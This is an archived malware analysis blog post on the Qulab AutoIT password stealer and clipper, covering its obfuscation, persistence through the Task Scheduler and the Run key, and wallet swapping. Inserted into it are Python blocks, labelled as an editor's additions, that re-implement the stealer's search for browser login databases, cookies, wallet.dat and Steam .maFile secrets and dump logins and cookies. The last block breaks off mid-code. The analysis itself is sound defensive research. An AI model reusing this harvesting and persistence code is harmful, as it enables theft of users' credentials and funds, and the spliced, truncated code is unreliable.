{
	"id": "4786cab7-5310-467f-817b-cdfd6f4ef080",
	"created_at": "2026-04-06T00:13:51.585366Z",
	"updated_at": "2026-04-10T13:11:20.180936Z",
	"deleted_at": null,
	"sha1_hash": "061edf663622d396aedb795093b66293f85101e6",
	"title": "Let’s play with Qulab, an exotic malware developed in AutoIT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2308851,
	"plain_text": "Let’s play with Qulab, an exotic malware developed in AutoIT\r\nPublished: 2019-03-25 · Archived: 2026-04-05 20:26:02 UTC\r\nAfter some issues that kept me far away from my researches, it’s time to put my hands again on some sympathetic\r\nstuff. This one is technically and finally my real first post of the year (The anti-VM one was a particular case).\r\nSo today, we will dig into Qulab Stealer + Clipper, another password-stealer that had my attention to be (on my\r\npoint view) an exotic one, because it is fully developed in AutoIT and have a really cool obfuscation technique\r\nthat occupied me for some times. Trends to have malware that is coded in some languages different than C, C++,\r\n.NET or Delphi is not new, there is a perfect case with the article made by Hasherezade earlier this year for a\r\nstealer developed in GoLang (that I highly recommend taking a look on it).\r\nNormally, using AutoIT scripts in that area is pretty common. It’s widely used as a packer for hiding detection or\r\nas a node into an infection chain, but as a whole password-stealer, it’s not the same. I could say it’s a particular\r\ncase because it’s resale with support on the black market.\r\nEven if as usual, techniques remains the same for the stealing features, it’s always entertaining to see how there is\r\nplenty of ways to achieve one simple goal. 
Also, the versatility of this one is what overwhelmed my curiosity and burned all my sleep time…\r\nQulab focuses on these features:\r\nBrowser stealing\r\nWallet Clipper\r\nFTP creds\r\nDiscord / Telegram logs\r\nSteam (Session / Trade links / 2FA Authenticator by abusing a third-party software)\r\nTelegram Bot through a proxy\r\nGrabber\r\nAuto IT?\r\nAs I mentioned in the intro, Qulab is coded in AutoIT. For people who are not in touch with it or have no idea about it: it is an automation language with a BASIC-like syntax, designed to work only on Microsoft Windows.\r\nThere are two ways to execute AutoIT scripts:\r\nIf the script is run in its .au3 source form, the AutoIT runtime and all the libraries it needs must be installed.\r\nIf the script is compiled, the interpreter and everything the script needs are embedded into the resulting PE, so AutoIT does not have to be installed to execute it.\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 1 of 31\n\nWhen the script is compiled into an executable, it is easy to tell that we are dealing with an AutoIT script by simply checking some strings, and there are already Yara rules that do this job.\r\nrule AutoIt\r\n{\r\nmeta:\r\nauthor = \"_pusher_\"\r\ndate = \"2016-07\"\r\ndescription = \"www.autoitscript.com/site/autoit/\"\r\nstrings:\r\n$aa0 = \"AutoIt has detected the stack has become corrupt.\\n\\nStack corruption typical\r\n$aa1 = \"AutoIt Error\" wide ascii nocase\r\n$aa2 = \"Missing right bracket ')' in expression.\" wide ascii nocase\r\n$aa3 = \"Missing operator in expression.\" wide ascii nocase\r\n$aa4 = \"Unbalanced brackets in expression.\" wide ascii nocase\r\n$aa5 = \"Error parsing function call.\" wide ascii nocase\r\n$aa6 = \"\u003e\u003e\u003eAUTOIT NO CMDEXECUTE\u003c\u003c\u003c\" wide ascii nocase\r\n$aa7 = \"#requireadmin\" 
wide ascii nocase\r\n$aa8 = \"#OnAutoItStartRegister\" wide ascii nocase\r\n$aa9 = \"#notrayicon\" wide ascii nocase\r\n$aa10 = \"Cannot parse #include\" wide ascii nocase\r\ncondition:\r\n5 of ($aa*)\r\n}\r\nOn my side, I will not explain the steps or the tools used to extract the code; there are plenty of tutorials on the internet explaining how to extract AutoIt scripts. The idea here is to focus on the malware, not on the extraction part…\r\nCode Obfuscation\r\nAfter extracting the code from the PE, it is easy to guess that something amazing is coming just by looking at the amount of code… Analyzing this malware is going to be a bit of a challenge.\r\ncat Qulab.au3 | wc -l\r\n21952 // some pain incoming\r\nThe source code is really (really) obfuscated but not hard to clean; it just takes some time with the help of homemade scripts. For an analyst who only wants the information, a simple dump of the process during execution plus a sandbox report is enough to understand the main tasks.\r\nFor non-technical people, I have created a dedicated page on GitHub that explains the AutoIT fundamentals. I highly recommend keeping it open while reading this article, it will make things easier. You should also read the official AutoIT FAQ to understand the API. 
Unfortunately, it is not as complete as the Microsoft MSDN documentation, but it is enough for the basic principles of this language…\r\nIt is impossible to explain every form of obfuscation in this malware, but here is a summary of the main tricks.\r\nVariable \u0026 Function Naming convention\r\nAll variables, with a few exceptions, have this form:\r\n\\$A\\d[A-F0-9]{3,10}\r\nIt is wonderful to see over ten thousand variables like this across the whole script (sarcasm):\r\n$A18A4000F15\r\n$A5AA4204E10\r\n$A0FA4403A33\r\n$A55A4601801\r\n$A24A4804C5C\r\n...\r\nGarbage conditions\r\nWhere there is obfuscated code, there is obviously a huge amount of nonsense conditions and unused functions. It does not take long to get the idea on Qulab because they are easy to catch by pure logic; take this one as an example:\r\nFUNC A5D10600720(BYREF $A37E6C01A00,$A183A702F3C)\r\n IF NOT ISDECLARED(\"SSA5D10600720\") THEN\r\n ENDIF\r\n...\r\n ...\r\nENDFUNC\r\nThis is a classic pattern: the condition only checks whether a variable (“SS” + function name) is not declared, and its body is empty. Inside the function there are always some local variables initialized for the function’s purposes, and most of the time their values come from the master array. 
By deobfuscating them, every condition of this pattern can be removed and the variables replaced by their corresponding values, which deletes a lot of code.\r\nUnused Functions\r\nAnother classic scheme is unused functions; removing them cleans thousands of lines of junk code, either with a script written for the purpose or with User Defined Functions made by the AutoIT community.\r\nInitiating Variables and using them\r\nGLOBAL LOCAL $VARIABLE_1 = FUNC1(ARRAY[POS])\r\n...Code....\r\nGLOBAL LOCAL $VARIABLE_455 = $VARIABLE_1\r\n...Code...\r\nGLOBAL LOCAL $VARIABLE_9331 = VARIABLE_455 \u003c- Final Value\r\n\u003e Initiating them through a condition\r\nIF $A4A7AC0550A=DEFAULT THEN $A4A7AC0550A=-NUMBER($A198A005329)\r\nIF $A2F7AD03E54=DEFAULT THEN $A2F7AD03E54=-NUMBER($A2C8A10261F)\r\nIF $A3D7AE0071E=DEFAULT THEN $A3D7AE0071E=-NUMBER($A218A202B4D)\r\nIF $A3F7AF01354=DEFAULT THEN $A3F7AF01354=-NUMBER($A2A8A300E5F)\r\n\u003e Using a counter variable in a 2D array, with a value that is stored inside a 20,000-entry array.\r\n$A31E5E11A1F[NUMBER($A2646512725)][NUMBER($A0C46615D39)]+=NUMBER($A5246713208)\r\n\u003e Hiding error code integers behind a mixture of functions and variables.\r\nRETURN SETERROR($A2C07504A0A,NUMBER($A411740414D),NUMBER($A6017502D45))\r\nCode Execution\r\nThis malware has an unorthodox way of executing code, and it is pretty cool.\r\n1. Read the directives and follow them to the main function.\r\n2. The main function sets up the master array (explained later).\r\n3. When this function is done, the script goes back to the beginning, just after the directives, and looks for global variables and instructions; in our case it will be global variables.\r\n4. 
When all the global variables have been initialized, it skips all the functions because they are simply not called (for the moment) and tries to reach some executable instruction (as explained above). When some code is finally reachable, a domino effect occurs: an initialized variable calls one function, which in turn calls one or more functions, and so on.\r\n5. During the same process, some encoded files hardcoded into the script are decoded and dropped for specific tasks. When all the setup tasks are done, it enters an infinite loop for specific purposes.\r\nIn the end, it could be schematized like this.\r\nDirectives are leading the road path\r\nEverything that starts with ‘#’ is a directive. This is technically the first thing the script checks, and here it is configured to go at all costs to a specific function, “A5300003647_”, which is the main function.\r\n#СЪЕБИСЬ ОТСЮБДА ДУДА ТЫ ССАНАЯ БЛЯХА МУХА\r\n#NoTrayIcon\r\n#OnAutoItStartRegister \"A5300003647_\"\r\nThe first line is not a real directive, just a vulgar Russian insult left for the analyst.\r\n#NoTrayIcon – Hide the AutoIT icon in the tray\r\n#OnAutoItStartRegister – The first function called at the beginning of the script (an equivalent of the main function)\r\nThe Main function is VIP\r\nThe first function of Qulab is critical because this is where almost all the data for the tasks is initialized. 
The variable $DLIT stores a “huge” string that is split on the delimiter “o2B2Ct” and stored into the array $OS.\r\nNote: the names mentioned here are the ones used in this stealer script; they may vary between samples but the idea remains the same.\r\nFUNC A5300003647_()\r\n FOR $AX0X0XA=1 TO 5\r\n LOCAL $DLIT=\"203020o2B2Ct203120o...\"\r\n GLOBAL $A5300003647,$OS=STRINGSPLIT($DLIT,\"o2B2Ct\",1)\r\n IF ISARRAY($OS) AND $OS[0]\u003e=19965 THEN EXITLOOP\r\n SLEEP(10)\r\n NEXT\r\nENDFUNC\r\nNote that STRINGSPLIT puts the element count in $OS[0], which is what the loop checks (at least 19965 entries): the script retries up to five times until the array is fully built before moving on.\r\nGlobal Variables are the keys\r\nGlobal variables are certainly the main focus of Qulab; they are nowhere and everywhere, and they are so tightly bound to the master array that a single modification of one variable can have a domino effect on the whole malware, ending in a crash of the script.\r\nWhen a variable is initialized, there are multiple steps behind it:\r\n1. Selecting a specific value from the master array\r\n2. Converting the value to a string\r\n3. Profit\r\nGLOBAL $A1D7450311E=A5300003647($OS[1])\r\nThe function “A5300003647” is in fact a “from hex” routine: it walks the string two hex characters at a time and converts each pair into the corresponding character (CHR(DEC(...))).\r\nFUNC A5300003647($A5300003647)\r\n LOCAL $A5300003647_\r\n FOR $X=1 TO STRINGLEN($A5300003647) STEP 2\r\n $A5300003647_\u0026=CHR(DEC(STRINGMID($A5300003647,$X,2)))\r\n NEXT\r\n RETURN $A5300003647_\r\nENDFUNC\r\nBy tweaking the instructions of the AutoIT script, with the help of some adjustments (thanks to homemade deobfuscation scripts and patience), the variables are now almost fully readable.\r\nAfter modifying our 19966 variables (that’s a lot), we can clearly see, statically, most of the tasks that the malware has in the pipe.\r\n
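As an added example (editor's Python, not the author's script or tooling), here is a small deobfuscation pass that reproduces the steps just described: split the master string on its delimiter and decode each entry with the two-hex-digit routine, inline every A5300003647($OS[n]) lookup as a string literal, propagate the resulting constant GLOBALs, and drop the empty IF NOT ISDECLARED(...) guards from the Garbage conditions part. The function, array and delimiter names are this sample's and are parameters; the AutoIt it runs on is a constructed miniature, not Qulab code.

```python
import re

# Added example (editor's code, not from the post). Reproduces the first
# deobfuscation passes described in the post on a constructed miniature of
# the script: decode the master array, inline the lookups, propagate
# constants, drop the empty ISDECLARED guards. Names default to this sample's.

def from_hex(s):
    # Same operation as the script's routine: CHR(DEC(STRINGMID($s, $x, 2))),
    # two hex characters at a time.
    return ''.join(chr(int(s[i:i + 2], 16)) for i in range(0, len(s) - 1, 2))

def au3_literal(value):
    # AutoIt string literal: a double quote inside "..." is doubled.
    return '"' + value.replace('"', '""') + '"'

def master_array(script, delim='o2B2Ct', var='$DLIT'):
    # STRINGSPLIT($DLIT, delim, 1) yields [count, e1, e2, ...]: element 0 is
    # the count, so $OS[n] is the n-th decoded entry (1-based).
    m = re.search(re.escape(var + '="') + '([^"]*)"', script)
    if not m:
        raise ValueError('master string %s not found' % var)
    parts = m.group(1).split(delim)
    return [str(len(parts))] + [from_hex(p) for p in parts]

def inline_master_lookups(script, table, fn='A5300003647', arr='$OS'):
    # A5300003647($OS[n]) -> "decoded value"
    pat = re.escape(fn + '(' + arr + '[') + '([0-9]+)' + re.escape('])')
    return re.sub(pat, lambda m: au3_literal(table[int(m.group(1))]), script)

def propagate_constants(script):
    # For every GLOBAL $NAME="literal" (no $ inside the literal), replace later
    # uses of $NAME by the literal. The lookahead keeps $A1 from matching the
    # start of $A1D..., the lookbehind skips the defining line itself.
    out = script
    for name, lit in re.findall('GLOBAL ([$][A-Za-z0-9_]+)=("[^"$]*")', out):
        pat = '(?<!GLOBAL )' + re.escape(name) + '(?![A-Za-z0-9_])'
        out = re.sub(pat, lambda m, lit=lit: lit, out)
    return out

def strip_isdeclared_guards(script):
    # IF NOT ISDECLARED("SS<func>") THEN / ENDIF with nothing in between.
    lines, out, i = script.split('\n'), [], 0
    while i < len(lines):
        cur = lines[i].strip().upper()
        nxt = lines[i + 1].strip().upper() if i + 1 < len(lines) else ''
        if cur.startswith('IF NOT ISDECLARED(') and nxt == 'ENDIF':
            i += 2
            continue
        out.append(lines[i])
        i += 1
    return '\n'.join(out)

def deobfuscate(script, delim='o2B2Ct', fn='A5300003647', arr='$OS'):
    table = master_array(script, delim)
    s = inline_master_lookups(script, table, fn, arr)
    s = propagate_constants(s)
    return strip_isdeclared_guards(s)

def to_hex(s):
    # Only used to build the constructed sample below.
    return ''.join('%02X' % ord(c) for c in s)

# Constructed sample in the shape the post shows; the values are invented.
SAMPLE = '\n'.join([
    '#NoTrayIcon',
    '#OnAutoItStartRegister "A5300003647_"',
    'FUNC A5300003647_()',
    ' LOCAL $DLIT="' + 'o2B2Ct'.join(
        to_hex(v) for v in ['crypt32.dll', 'Schedule.Service', 'PT1M']) + '"',
    ' GLOBAL $A5300003647,$OS=STRINGSPLIT($DLIT,"o2B2Ct",1)',
    'ENDFUNC',
    'GLOBAL $A1A48943E37=A5300003647($OS[1])',
    'GLOBAL $A60FD553516=OBJCREATE(A5300003647($OS[2]))',
    'FUNC A5D10600720(BYREF $A37E6C01A00)',
    ' IF NOT ISDECLARED("SSA5D10600720") THEN',
    ' ENDIF',
    ' RETURN DLLOPEN($A1A48943E37)',
    'ENDFUNC',
])

if __name__ == '__main__':
    print(deobfuscate(SAMPLE))
```

Run against a real extraction, the master string is far longer than the regex here expects to be pretty, and a second propagation pass is needed for the variable-to-variable chains ($VARIABLE_455 = $VARIABLE_1) shown earlier; the passes are deliberately separate so each can be re-run on its own.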
This does not mean we are done with this part: it is only a first draft and it needs to be cleaned again, because there are a lot of unfinished tasks and, as explained above, most of the functions are unused.\r\nMain code\r\nAfter all that mess to understand the correct path through the code, the script now enters the core step; the more serious business begins right now.\r\nTo summarize, this is briefly what’s going on:\r\nSetting up the variables that are configured in the builder\r\nName of the payload\r\nName of the scheduled task\r\nName of the scheduled task folder\r\nName of the hidden AppData folder where the malware will do its work\r\nWallets\r\nHide itself\r\nDo all the stealing tasks\r\nDecode \u0026 load dependencies when required\r\nSet up the persistence\r\nAnd more… 🙂\r\nWhere is the exit?\r\nBetween two functions there are sometimes global variable declarations, or sneaky calls that have an impact on the payload itself. They cannot really be seen at first glance because they are drowned in the amount of code. 
So one or two lines between dozens of functions are easy to miss.\r\nOne of them registers the specific function that will be called at the very end:\r\nONAUTOITEXITREGISTER(\"A1AA3F04218\")\r\nSo with a little research, we find the function that will be called at the end of the script, buried in a huge amount of spaghetti code.\r\nIt is in fact closing the crypt32.dll module that was opened for the CryptoAPI.\r\nGLOBAL $A1A48943E37=DLLOPEN(\"crypt32.dll\")\r\nSome curiosities to disclose\r\nHomemade functions or already made?\r\nFor most of the tasks, the malware uses a lot of “User Defined Functions” (UDF) with some tweaks. As explained in the AutoIT FAQ: “These libraries have been written to allow easy integration into your own scripts and are a very valuable resource for any programmer”. It confirms more and more that open-source code and programming forums are useful for both sides (good \u0026 bad), so developing malware does not require being a wizard: everything is available for free.\r\nFor Qulab, it is confirmed that the author used tweaked or original UDFs for:\r\nSQL content\r\nArchiving content\r\nTelegram API\r\nWindows API\r\nMemory usage\r\nMemory optimization\r\nAutoIT programs are known to be greedy in memory consumption, which could make them more detectable. Several times, the malware tries to reduce the amount of allocated memory by removing as many pages as possible from the working set of the process. 
This is done with EmptyWorkingSet and can reportedly halve the memory usage of the program.\r\nFUNC A0E64003F0C($A1B85D1000C=0)\r\n IF NOT $A1B85D1000C THEN $A1B85D1000C=EXECUTE(\" @AutoItPID \")\r\n LOCAL $A3485F11D1D=DLLCALL(\"kernel32.dll\",\"handle\",\"OpenProcess\",\"dword\",(($A209DF54B2B\u003c1536)?128\r\n IF @ERROR OR NOT $A3485F11D1D[0] THEN RETURN SETERROR(@ERROR+20,@EXTENDED,0)\r\n LOCAL $A5F55F1392E=DLLCALL(EXECUTE(\" @SystemDir \")\u0026\"\\psapi.dll\",\"bool\",\"EmptyWorkingSet\",\"handle\r\n RETURN 1\r\nENDFUNC\r\nFirst, it grabs the PID of the compiled AutoIT program through the @AutoItPID macro, then opens it with OpenProcess. One of the arguments is quite obscure:\r\n(($A209DF54B2B\u003c1536)?1280:4352)\r\nWhat is behind the variable $A209DF54B2B? Let’s dig into it…\r\nGLOBAL CONST $A209DF54B2B=A2054F01A5F()\r\nFUNC A2054F01A5F()\r\n LOCAL $A1656715F1D=DLLSTRUCTCREATE(\"struct;dword OSVersionInfoSize;dword MajorVersion;dword Mino\r\n DLLSTRUCTSETDATA($A1656715F1D,1,DLLSTRUCTGETSIZE($A1656715F1D))\r\n LOCAL $A5F55F1392E=DLLCALL(\"kernel32.dll\",\"bool\",\"GetVersionExW\",\"struct*\",$A1656715F1D)\r\n IF @ERROR OR NOT $A5F55F1392E[0] THEN RETURN SETERROR(@ERROR,@EXTENDED,0)\r\n RETURN BITOR(BITSHIFT(DLLSTRUCTGETDATA($A1656715F1D,2),-8),DLLSTRUCTGETDATA($A1656715F1D,3))\r\nENDFUNC\r\nGetVersionExW fills an OSVERSIONINFOW structure with the version of the running operating system. The function then returns MajorVersion shifted left by 8 bits (BITSHIFT with a negative count shifts left), ORed with MinorVersion, so the result has the same layout as the _WIN32_WINNT constants: Windows Vista is 0x0600, i.e. 1536, exactly the value the ternary compares against.\r\n
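As an added example (editor's Python, not the post's code nor the AutoIt UDF it comes from), the following reproduces the two helpers above: the version word GetVersionExW's result is packed into, the access mask the ternary picks from it, and, on Windows only, the OpenProcess / EmptyWorkingSet / CloseHandle sequence through ctypes. The access-right values are the documented Win32 constants; the function names and the sample version numbers are mine.

```python
import sys

# Added example (editor's code, not from the post or the AutoIt UDF). Mirrors
# the version word the script computes and the OpenProcess mask it derives
# from it, then performs the same EmptyWorkingSet call on Windows.

PROCESS_SET_QUOTA = 0x0100
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000   # exists since Windows Vista
WIN32_WINNT_VISTA = 0x0600                   # 1536, the script's threshold

def version_word(major, minor):
    # BITOR(BITSHIFT(MajorVersion, -8), MinorVersion): major byte, minor byte.
    return (major << 8) | minor

def openprocess_access(winver):
    # (($winver < 1536) ? 1280 : 4352)
    if winver < WIN32_WINNT_VISTA:
        return PROCESS_SET_QUOTA | PROCESS_QUERY_INFORMATION           # 0x0500
    return PROCESS_SET_QUOTA | PROCESS_QUERY_LIMITED_INFORMATION       # 0x1100

def access_names(mask):
    # Decode a mask into the right names, lowest bit first.
    names = {PROCESS_SET_QUOTA: 'PROCESS_SET_QUOTA',
             PROCESS_QUERY_INFORMATION: 'PROCESS_QUERY_INFORMATION',
             PROCESS_QUERY_LIMITED_INFORMATION: 'PROCESS_QUERY_LIMITED_INFORMATION'}
    return [n for bit, n in sorted(names.items()) if mask & bit]

def empty_working_set(pid=None):
    # Windows only: OpenProcess with the version-dependent mask, then
    # psapi!EmptyWorkingSet, then CloseHandle. Defaults to the current process
    # like the script's @AutoItPID fallback.
    if sys.platform != 'win32':
        raise OSError('EmptyWorkingSet is a Windows-only API')
    import ctypes
    import os
    from ctypes import wintypes
    k32 = ctypes.WinDLL('kernel32', use_last_error=True)
    psapi = ctypes.WinDLL('psapi', use_last_error=True)
    k32.OpenProcess.restype = wintypes.HANDLE
    k32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
    psapi.EmptyWorkingSet.argtypes = [wintypes.HANDLE]
    k32.CloseHandle.argtypes = [wintypes.HANDLE]
    # sys.getwindowsversion() reports what GetVersionExW reports for an
    # unmanifested process, so the mask choice matches the script's.
    ver = sys.getwindowsversion()
    access = openprocess_access(version_word(ver.major, ver.minor))
    handle = k32.OpenProcess(access, False, pid or os.getpid())
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        if not psapi.EmptyWorkingSet(handle):
            raise ctypes.WinError(ctypes.get_last_error())
    finally:
        k32.CloseHandle(handle)
    return True

if __name__ == '__main__':
    for major, minor in [(5, 1), (6, 0), (6, 1), (10, 0)]:
        w = version_word(major, minor)
        print('%d.%d -> 0x%04X -> %s' % (major, minor, w,
                                         access_names(openprocess_access(w))))
```

Both masks are the minimum EmptyWorkingSet documents (PROCESS_SET_QUOTA plus one of the two query rights); the only reason for the branch is that PROCESS_QUERY_LIMITED_INFORMATION does not exist before Vista.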
Checking against the official API constants:\r\n//\r\n// _WIN32_WINNT version constants\r\n//\r\n#define _WIN32_WINNT_NT4 0x0400 // Windows NT 4.0\r\n#define _WIN32_WINNT_WIN2K 0x0500 // Windows 2000\r\n#define _WIN32_WINNT_WINXP 0x0501 // Windows XP\r\n#define _WIN32_WINNT_WS03 0x0502 // Windows Server 2003\r\n#define _WIN32_WINNT_WIN6 0x0600 // Windows Vista\r\n#define _WIN32_WINNT_VISTA 0x0600 // Windows Vista\r\n#define _WIN32_WINNT_WS08 0x0600 // Windows Server 2008\r\n#define _WIN32_WINNT_LONGHORN 0x0600 // Windows Vista\r\n#define _WIN32_WINNT_WIN7 0x0601 // Windows 7\r\n#define _WIN32_WINNT_WIN8 0x0602 // Windows 8\r\n#define _WIN32_WINNT_WINBLUE 0x0603 // Windows 8.1\r\n#define _WIN32_WINNT_WINTHRESHOLD 0x0A00 // Windows 10\r\n#define _WIN32_WINNT_WIN10 0x0A00 // Windows 10\r\nKnowing the Windows version, the script picks the right access mask for OpenProcess: before Vista it asks for 1280 = 0x0500, that is PROCESS_SET_QUOTA (0x0100) | PROCESS_QUERY_INFORMATION (0x0400); on Vista and later it asks for 4352 = 0x1100, that is PROCESS_SET_QUOTA | PROCESS_QUERY_LIMITED_INFORMATION (0x1000), a right that only exists since Vista. These are precisely the rights EmptyWorkingSet requires, and the whole routine is _WinAPI_EmptyWorkingSet from the AutoIT WinAPI UDF, only renamed. The last step is the EmptyWorkingSet call itself, which trims the pages the process does not currently need from its working set.\r\nTask scheduling\r\nTask scheduling in stealers is usually one line of code: a simple and effective ShellExecute of schtasks.exe to run something periodically as a persistence trick. 
Here it is a little more advanced than usual in several respects, because it uses the Task Scheduler COM object (TaskService):\r\n$A60FD553516=OBJCREATE(\"Schedule.Service\")\r\n$A60FD553516.Connect()\r\nThe new task is created with a flags value of 0; as the MSDN documentation explains, that argument is reserved and must be 0.\r\n$A489E853A1E=$A60FD553516.NewTask(0)\r\nTo be less detectable, some tricks are used to look as legitimate as possible: the registration info claims the task was created by the current user, and the description, the task name and the task folder are set to whatever the customer configured.\r\n$A4A9E951E11=$A489E853A1E.RegistrationInfo()\r\n$A4A9E951E11.Description()= $A487E851D38\r\n$A4A9E951E11.Author()=EXECUTE(\" @LogonDomain \")\u0026\"\\\"\u0026EXECUTE(\" @UserName \")\r\nAfter some other required values that are not worth discussing, the settings part of this task is far more interesting.\r\nTo maximize the yield, Qulab tunes the task so that it runs whatever the situation:\r\nThe laptop is not on charge\r\nThe battery is low\r\nNetwork available or not\r\nIn the end, every minute, the Task Scheduler runs the task, executing the malware from the hidden folder in %APPDATA%.\r\n$A4B9EA50562=$A489E853A1E.Settings()\r\n$A4B9EA50562.MultipleInstances() = 0\r\n$A4B9EA50562.DisallowStartIfOnBatteries()= FALSE\r\n$A4B9EA50562.StopIfGoingOnBatteries()= FALSE\r\n$A4B9EA50562.AllowHardTerminate()= TRUE\r\n$A4B9EA50562.StartWhenAvailable()= TRUE\r\n$A4B9EA50562.RunOnlyIfNetworkAvailable()= FALSE\r\n$A4B9EA50562.Enabled()= TRUE\r\n$A4B9EA50562.Hidden()= TRUE\r\n$A4B9EA50562.RunOnlyIfIdle()= FALSE\r\n$A4B9EA50562.WakeToRun()= TRUE\r\n$A4B9EA50562.ExecutionTimeLimit()= \"PT1M\" // Default PT99999H\r\n$A4B9EA50562.Priority()= 3 // Default 
5\r\n$A3E9EB51B0D=$A489E853A1E.Principal()\r\n$A3E9EB51B0D.Id()=EXECUTE(\" @UserName \")\r\n$A3E9EB51B0D.DisplayName()=EXECUTE(\" @UserName \")\r\n$A3E9EB51B0D.LogonType()=$A0B8E352D04\r\n$A3E9EB51B0D.RunLevel()= 0\r\nAnother Persistence?\r\nA classic one is used: the Run key.\r\nIF NOT A3F64500C0D($A00DEB51215,$A35DEF51B61) THEN\r\nREGWRITE(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\",\r\n $A00DEB51215,\"REG_SZ\",\"\"\"\"\u0026$A104A053309\u0026\"\\\"\u0026$A60DE955B5F\u0026\"\"\"\")\r\nThere is not much more to say about this part…\r\nEncoding is not encryption\r\nWhile digging into the code, I found a mistake that made me laugh a little: the classic claim that base64 is encryption. So maybe after this in-depth analysis the malware developer will fix his mistake (or just insult me :’) )\r\nMalware Features\r\nClipper\r\nIf you are unfamiliar with clippers, the idea is really simple: alter the content of the clipboard with the help of some filters/rules, in most cases regular expressions. If the content matches, the matched data is replaced with something the attacker configured. It is heavily used to swap the victim’s cryptocurrency wallet addresses for the attacker’s. This is also the case with Qulab, which focuses on wallets \u0026 Steam trade links.\r\nThis piece of code represents the core of the clipper:\r\nThese are the steps:\r\n1. Execute a routine checking whether there is any new data to send to the attacker\r\n2. Check that the scheduled task is still present in the Task Scheduler\r\n3. Clean the working set (see the memory optimization explained above)\r\n4. 
Make a pause in the loop for 200 ms\r\n5. Get the content of the clipboard with CLIPGET\r\n6. Check every wallet pattern; if one matches, substitute the configured value\r\n7. Put the modified content back on the clipboard with CLIPPUT\r\n8. Repeat\r\nAll the values for the different wallets that the attacker wants to swap in are stored at the beginning of the code section. By pure speculation, I consider these to be the values configured in the builder.\r\nCurrent list of cryptocurrency wallets (and other targets) that the clipper switches:\r\nBitcoin, Bitcoin Cash, Bitcoin Gold, Bytecoin, Cardano, Lisk, Dash, Doge, Electronium, Ethereum, Graft, Litecoin, Monero, Neo, QIWI, Qtum, Steam Trade Link, Stratis, VIA, WME, WMR, WMU, WMX, WMZ, Waves, Yandex Money, ZCash\r\nBrowser Stealer\r\nQulab is a kind of puzzle with multiple pieces, and each piece is itself another puzzle. Collecting and sorting them to complete the whole fresco is a bit of a challenge. 
I can admit that for the browser part, even if the concept is easy and will always remain the same (the fundamentals of a password stealer), the way it was implemented is somewhat clever.\r\nFirst, every browser supported by the malware is checked in turn, with specific arguments:\r\nThe browser path\r\nThe files that the stealer wants to grab, with “|” as a delimiter\r\nThe name of the browser\r\nThese go to a very important function that will search (not only for browsers) for these kinds of files:\r\nwallet.dat\r\nLogin Data\r\nformhistory.sqlite\r\nWeb Data\r\ncookies.sqlite\r\nCookies\r\n.maFile\r\nWhen a file matches, it enters a loop that saves the path and stores it in one master variable, with “|” as a delimiter between every important file.\r\nWhen all the files have been found, a few regular expressions are enough to filter and split the data that the malware wants to grab.\r\n
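As an added example (editor's Python, not the post's code or the stealer's), here is the search step just described carried through to the SQLite step that the next part of the post shows: walk profile directories for the target file names, collect the hits into one "|"-delimited string, then open the SQLite hits and run queries of the same kind the post lists. The queries are mine, written from the Chromium schema (the post's own cookie queries are cut off), and the profile they run on is a constructed sample, not real browser data.

```python
import os
import sqlite3
import tempfile

# Added example (editor's code, not from the post). Reproduces the browser
# stealer's search step and the SQLite step that follows in the post, on a
# constructed profile tree. Queries are written from the Chromium schema.

TARGET_NAMES = ['wallet.dat', 'Login Data', 'formhistory.sqlite', 'Web Data',
                'cookies.sqlite', 'Cookies', '.maFile']

def wanted(name):
    # Exact match for the fixed names; '.maFile' is a suffix, since Steam
    # Desktop Authenticator names the file after the account.
    return name in TARGET_NAMES or name.endswith('.maFile')

def find_loot(root):
    # Same layout as the stealer's master variable: every hit, '|'-separated.
    hits = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if wanted(f):
                hits.append(os.path.join(dirpath, f))
    return '|'.join(sorted(hits))

LOGINS_SQL = 'SELECT username_value, password_value, origin_url, action_url FROM logins'

# Netscape cookies.txt columns: domain, flag, path, secure, expiry, name, value.
# Chromium stores expires_utc as microseconds since 1601-01-01; the arithmetic
# converts it to a Unix timestamp.
COOKIES_SQL = ("SELECT host_key, 'FALSE' AS flag, path, "
               "CASE WHEN is_secure = 1 THEN 'TRUE' ELSE 'FALSE' END AS secure, "
               "CAST(expires_utc / 1000000 - 11644473600 AS INTEGER), name, value "
               "FROM cookies")

def query(path, sql):
    con = sqlite3.connect(path)
    try:
        return con.execute(sql).fetchall()
    finally:
        con.close()

def dump_logins(path):
    # In a real profile password_value is a DPAPI blob (CryptProtectData); it
    # only decrypts under the victim's logon, which is why the stealer decrypts
    # on the box instead of just copying the file.
    return query(path, LOGINS_SQL)

def cookies_netscape(path):
    return ['\t'.join(str(c) for c in row) for row in query(path, COOKIES_SQL)]

def build_sample_profile():
    # Constructed tree: one Chromium-style profile, one SDA folder, plus a file
    # that is not on the list (History) to show it is ignored.
    root = tempfile.mkdtemp(prefix='qulab-demo-')
    profile = os.path.join(root, 'Google', 'Chrome', 'User Data', 'Default')
    os.makedirs(profile)
    con = sqlite3.connect(os.path.join(profile, 'Login Data'))
    con.execute('CREATE TABLE logins (origin_url TEXT, action_url TEXT, '
                'username_value TEXT, password_value BLOB)')
    con.execute('INSERT INTO logins VALUES (?, ?, ?, ?)',
                ('https://example.test/', 'https://example.test/login',
                 'alice', b'dpapi-blob-placeholder'))
    con.commit()
    con.close()
    con = sqlite3.connect(os.path.join(profile, 'Cookies'))
    con.execute('CREATE TABLE cookies (host_key TEXT, name TEXT, value TEXT, '
                'path TEXT, expires_utc INTEGER, is_secure INTEGER)')
    con.execute('INSERT INTO cookies VALUES (?, ?, ?, ?, ?, ?)',
                ('.example.test', 'session', 'abc123', '/', 13200000000000000, 1))
    con.commit()
    con.close()
    with open(os.path.join(profile, 'History'), 'w') as f:
        f.write('')
    sda = os.path.join(root, 'SDA', 'maFiles')
    os.makedirs(sda)
    with open(os.path.join(sda, 'account.maFile'), 'w') as f:
        f.write('{"shared_secret": "placeholder"}')
    return root

if __name__ == '__main__':
    loot = find_loot(build_sample_profile())
    for p in loot.split('|'):
        if p.endswith('Login Data'):
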